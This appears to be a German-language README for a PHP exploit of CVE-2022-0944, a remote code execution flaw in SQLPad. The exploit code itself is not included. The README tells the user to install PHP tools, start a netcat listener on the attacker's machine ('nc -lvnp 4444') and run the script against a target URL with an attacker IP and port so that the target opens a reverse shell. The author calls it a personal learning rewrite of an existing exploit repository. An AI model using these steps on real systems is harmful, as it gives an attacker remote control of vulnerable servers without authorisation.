
CVE-2022-0944 Remote Code Execution Exploit
Dieser PHP-Code wurde entwickelt, um eine Remote Code Execution (RCE)-Sicherheitslücke in SQLPad auszunutzen, die im Zusammenhang mit CVE-2022-0944 steht.
Er funktioniert, indem bösartiger Code in die SQLPad-Anwendung eingeschleust wird, der sie zwingt, einen Systembefehl auszuführen, der eine Reverse Shell öffnet – eine Verbindung, die dem Angreifer die Fernsteuerung des verwundbaren Systems ermöglicht.
sudo apt-get install php-clisudo apt-get install php-curlUm die Reverse-Shell-Verbindung zu erfassen, starten Sie Netcat auf dem Rechner des Angreifers:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: Die Root-URL der verwundbaren SQLPad-Instanz (z. B. http://target.com:3000)
<attacker_ip>: Die IP-Adresse des Angreifers, die auf die Reverse-Verbindung wartet (dieselbe IP wie bei Netcat)
<attacker_port>: Der Port, auf dem der Angreifer lauscht (derselbe Port wie bei Netcat)
Die ursprüngliche Exploit-Logik basierte auf diesem Repository:
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
Mein Ziel war es, die Exploit-Logik zu verstehen und sie als persönliche Herausforderung in einer anderen Programmiersprache neu zu schreiben.
Zusätzliche Referenz: 🔗 CVE-2022-0944 – NVD